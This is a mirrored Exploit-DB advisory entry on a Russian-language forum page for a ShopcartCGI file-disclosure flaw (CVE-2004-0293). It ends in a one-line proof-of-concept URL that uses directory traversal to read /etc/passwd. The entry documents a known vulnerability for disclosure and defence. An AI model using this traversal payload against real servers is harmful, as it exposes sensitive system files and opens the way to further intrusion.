- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23706
- Проверка EDB
-
- Пройдено
- Автор
- G00DB0Y
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2004-0293
- Дата публикации
- 2004-02-16
Код:
source: https://www.securityfocus.com/bid/9670/info
It has been reported that ShopcartCGI is prone to a remote file disclosure vulnerability. This issue is due to insufficient validation of user-supplied input.
Upon successful exploitation of this issue an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.
http://www.example.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd- Источник
- www.exploit-db.com
